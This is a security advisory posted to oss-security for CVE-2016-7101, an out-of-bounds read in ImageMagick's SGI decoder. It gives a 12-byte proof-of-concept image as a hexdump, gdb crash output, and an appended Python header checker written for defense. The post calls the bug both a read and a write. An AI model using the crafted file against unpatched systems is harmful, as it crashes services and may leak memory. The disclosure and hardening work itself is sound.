Date: Mon, 26 Sep 2016 07:54:24 +0000
From: pwchen(陈佩文) <pwchen@...cent.com>
To: oss-security <oss-security@...ts.openwall.com>
Subject: CVE-2016-7101 - ImageMagick SGI Coder Out-Of-Bounds Read Vulnerability

Hi.

This is Peiwen Chen of Tencent's Xuanwu Lab & RayZhong of Tencent's Keen Lab.
During our research, we found an Out-Of-Bounds write vulnerability in
 ImageMagick's SGI coder.

When ImageMagick is identifying an SGI-format image, we can craft an SGI file
with a big value of row. It will read a certain number of times, controllable
by the value of row, which causes an Out-Of-Bounds Read.

The ImageMagick team has fixed the vulnerability we reported.


Upstream fix:
https://github.com/ImageMagick/ImageMagick/commit/7afcf9f71043df15508e46f079387bd4689a738d
https://github.com/ImageMagick/ImageMagick/commit/8f8959033e4e59418d6506b345829af1f7a71127

Debian Bug report:
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=836776


Attached are a proof of concept and a backtrace.

$ hexdump PoC.sgi
0000000 da01 0100 0000 fffe 0200 0400
000000c

$ convert PoC.sgi


Program received signal SIGSEGV, Segmentation fault.
[------------------------registers------------------------]
RAX: 0x0
RBX: 0x1
RCX: 0xf939
RDX: 0x6031b0 --> 0x0
RSI: 0x7ffff7fe8090 --> 0x1
RDI: 0x7ffff7dcef98 --> 0x1
RBP: 0xdfbc
RSP: 0x7fffffff5e60 --> 0xffffffff54535254
RIP: 0x7ffff74eae8b (<IdentifyImageGray+795>: movss  xmm0,DWORD PTR [r15+rax*4])
R8 : 0x744850 --> 0x0
R9 : 0x1
R10: 0x69a000 --> 0x0
R11: 0x1
R12: 0x641600 --> 0x600000000
R13: 0x6535f0 --> 0x1700000001
R14: 0x603178 --> 0x6031b0 --> 0x0
R15: 0x765000                          <== end address of heap
[---------------------------code---------------------------]
   0x7ffff74eae7d <IdentifyImageGray+781>: inc    BYTE PTR [rdx+rcx*1]
   0x7ffff74eae80 <IdentifyImageGray+784>: mov    DWORD PTR [rax],0x5177
   0x7ffff74eae86 <IdentifyImageGray+790>: mov    rax,QWORD PTR [rsp+0x30]
=> 0x7ffff74eae8b <IdentifyImageGray+795>: movss  xmm0,DWORD PTR [r15+rax*4]
   0x7ffff74eae91 <IdentifyImageGray+801>: movaps XMMWORD PTR [rsp+0x40],xmm0
   0x7ffff74eae96 <IdentifyImageGray+806>: mov    rax,QWORD PTR [rsp+0x28]
   0x7ffff74eae9b <IdentifyImageGray+811>: movss  xmm4,DWORD PTR [r15+rax*4]
   0x7ffff74eaea1 <IdentifyImageGray+817>: subss  xmm0,xmm4
[---------------------------stack---------------------------]
00:0000| rsp 0x7fffffff5e60 --> 0xffffffff54535254
01:0008|     0x7fffffff5e68 --> 0x0
02:0016|     0x7fffffff5e70 --> 0x63d600 --> 0x6535f0 --> 0x1700000001
03:0024|     0x7fffffff5e78 --> 0x614160 --> 0x1a9
04:0032|     0x7fffffff5e80 --> 0x0
05:0040|     0x7fffffff5e88 --> 0x1
06:0048|     0x7fffffff5e90 --> 0x0
07:0056|     0x7fffffff5e98 --> 0xfeff
[-----------------------------------------------------------]
Legend: stack, code, data, heap, rodata, value
Stopped reason: SIGSEGV
0x00007ffff74eae8b in IsPixelMonochrome (image=<optimized out>, pixel=<optimized out>) at ./MagickCore/pixel-accessor.h:561
561   red_green=(MagickRealType) pixel[image->channel_map[RedPixelChannel].offset]-

gdb-peda$ bt
#0  0x00007ffff74eae8b in IsPixelMonochrome (image=<optimized out>, pixel=<optimized out>) at ./MagickCore/pixel-accessor.h:561
#1  IdentifyImageGray (image=<optimized out>, exception=<optimized out>) at MagickCore/attribute.c:683
#2  0x00007ffff74ebb7a in IdentifyImageType (image=0x6535f0, exception=0x614160) at MagickCore/attribute.c:821
#3  0x00007ffff7647d39 in IdentifyImage (image=0x6535f0, file=<optimized out>, verbose=<optimized out>, exception=0x614160) at MagickCore/identify.c:494
#4  0x00007ffff71024a6 in IdentifyImageCommand (image_info=<optimized out>, argc=<optimized out>, argv=<optimized out>, metadata=<optimized out>, exception=<optimized out>) at MagickWand/identify.c:336
#5  0x00007ffff7153e53 in MagickCommandGenesis (image_info=<optimized out>, command=<optimized out>, argc=<optimized out>, argv=<optimized out>, metadata=<optimized out>, exception=<optimized out>) at MagickWand/mogrify.c:183
#6  0x0000000000401cae in MagickMain (argc=<optimized out>, argv=<optimized out>) at utilities/magick.c:145
#7  main (argc=<optimized out>, argv=<optimized out>, argv@...ry=0x7fffffffeb48) at utilities/magick.c:176
#8  0x00007ffff5a3b830 in __libc_start_main (main=0x4015f0 <main>, argc=0x2, argv=0x7fffffffeb48, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffeb38) at ../csu/libc-start.c:291
#9  0x0000000000401519 in _start ()


gdb-peda$ vmmap
Start              End                Perm Name
0x00400000         0x00403000         r-xp /usr/local/bin/magick
0x00602000         0x00603000         r--p /usr/local/bin/magick
0x00603000         0x00604000         rw-p /usr/local/bin/magick
0x00604000         0x00765000         rw-p [heap]
0x00007ffff553f000 0x00007ffff5817000 r--p /usr/lib/locale/locale-archive


Regards,
Peiwen Chen
Tencent's Xuanwu Lab
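The 12 bytes shown in the hexdump above, decoded as an SGI header. This is an added example written for this page; it is not code from the post or from ImageMagick. The field layout (big-endian magic 0x01DA, storage type, bytes per channel, dimension, xsize, ysize, zsize, a fixed 512-byte header, and for RLE files two u32 tables of ysize*zsize entries after the header) follows the SGI image file format; the byte order assumed for the hexdump is the host little-endian word order that `hexdump` prints with no format flags, and the sanity checks are this example's own, not ImageMagick's. The PoC bytes and the "valid" comparison file are constructed inline so the script runs offline.

```python
import struct

# Bytes of PoC.sgi transcribed from the hexdump in the post above.
# hexdump with no format flags prints 16-bit words in host (little-endian)
# byte order, so the word "da01" is the byte pair 01 da, i.e. the SGI
# magic 0x01DA (474) in big-endian, as the format requires.
POC_SGI = bytes.fromhex("01da 0100 0000 feff 0002 0004")

SGI_MAGIC = 0x01DA
SGI_HEADER_LEN = 512          # fixed header size in the SGI image format
SGI_STORAGE_VERBATIM = 0
SGI_STORAGE_RLE = 1


def parse_sgi_header(data):
    """Decode the first 12 bytes of an SGI header (all fields big-endian).

    Returns a dict; raises ValueError if even those 12 bytes are missing.
    """
    if len(data) < 12:
        raise ValueError("fewer than 12 bytes: not even a partial SGI header")
    magic, storage, bpc, dimension, xsize, ysize, zsize = struct.unpack(
        ">HBBHHHH", data[:12])
    return {
        "magic": magic,
        "storage": storage,
        "bpc": bpc,            # bytes per channel, 1 or 2 in a valid file
        "dimension": dimension,
        "xsize": xsize,        # pixels per row (columns)
        "ysize": ysize,        # rows
        "zsize": zsize,        # channels
    }


def sgi_sanity_findings(data):
    """Return the reasons a file's SGI header cannot be trusted.

    An empty list means the header's own claims are consistent with the
    amount of data actually present. A decoder that sizes its reads from
    the dimension fields before checking this reads past the end of its
    input. These checks are the example's own, not ImageMagick's.
    """
    hdr = parse_sgi_header(data)
    findings = []
    if hdr["magic"] != SGI_MAGIC:
        findings.append("bad magic 0x%04x" % hdr["magic"])
    if hdr["bpc"] not in (1, 2):
        findings.append("bytes-per-channel %d is not 1 or 2" % hdr["bpc"])
    if hdr["storage"] not in (SGI_STORAGE_VERBATIM, SGI_STORAGE_RLE):
        findings.append("unknown storage type %d" % hdr["storage"])
    if 0 in (hdr["xsize"], hdr["ysize"], hdr["zsize"]):
        findings.append("zero-sized dimension")
    if len(data) < SGI_HEADER_LEN:
        findings.append("file is %d bytes, shorter than the %d-byte header"
                        % (len(data), SGI_HEADER_LEN))
    body = max(0, len(data) - SGI_HEADER_LEN)   # bytes after the header
    rows = hdr["ysize"] * hdr["zsize"]          # scanlines across all channels
    if hdr["storage"] == SGI_STORAGE_RLE:
        # RLE files carry two u32 tables (row start offsets, row lengths)
        # of ysize*zsize entries each, right after the header.
        tables = 2 * 4 * rows
        if body < tables:
            findings.append("RLE offset/length tables need %d bytes, only %d present"
                            % (tables, body))
    else:
        bpc = hdr["bpc"] if hdr["bpc"] in (1, 2) else 1
        need = hdr["xsize"] * rows * bpc
        if body < need:
            findings.append("header declares %d pixel bytes, only %d present"
                            % (need, body))
    return findings


def make_valid_sgi(xsize, ysize, zsize, bpc=1):
    """Build a minimal well-formed verbatim (uncompressed) SGI file.

    Constructed comparison data, not from the post: header fields this
    example does not care about (min/max, name, colormap) are left zero.
    """
    header = struct.pack(">HBBHHHH", SGI_MAGIC, SGI_STORAGE_VERBATIM, bpc,
                         3, xsize, ysize, zsize)
    header = header.ljust(SGI_HEADER_LEN, b"\0")
    pixels = bytes(xsize * ysize * zsize * bpc)   # all-black image
    return header + pixels


if __name__ == "__main__":
    print(parse_sgi_header(POC_SGI))
    for finding in sgi_sanity_findings(POC_SGI):
        print("PoC.sgi:", finding)
    print("valid file findings:", sgi_sanity_findings(make_valid_sgi(4, 2, 3)))
```

Run against the PoC bytes, the decoder shows xsize 0xfeff, ysize 2, zsize 4, RLE storage and a bytes-per-channel of 0, and the checks report that the file ends before the 512-byte header does and that the RLE row tables the decoder would consult are entirely absent. The same checks return nothing for the constructed well-formed file, which is the property a hardened reader wants: reject dimension claims the input cannot back up before allocating or reading anything from them.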
